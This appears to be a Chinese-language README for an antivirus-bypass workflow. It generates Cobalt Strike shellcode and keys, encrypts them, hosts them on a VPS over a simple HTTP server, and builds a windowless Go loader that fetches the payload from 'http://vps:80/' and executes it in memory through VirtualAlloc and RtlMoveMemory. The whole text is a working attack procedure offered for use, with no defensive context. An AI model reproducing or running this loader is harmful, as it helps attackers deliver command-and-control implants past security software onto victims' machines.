-
CS加载Bypass_Remake.cna插件,生成shellcode和加密key1、key2: "Attack" > "BypassShellCode"
-
将得到的shellcode和key的值分别做加密:
process_shellcode.exe shellcode
process_shellcode.exe key1
process_shellcode.exe key2
-
得到的三个结果分别手动保存为文件放在vps上 code.txt k1.txt k2.txt
-
在vps上起一个服务器:
python -m SimpleHTTPServer 80
-
修改shellcode_loader.go中的vps请求地址即可:
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory")
URI = "http://vps:80/"
)
-
编译go文件:
go build -ldflags "-H windowsgui" shellcode_loader.go
-
运行shellcode_loader.exe即可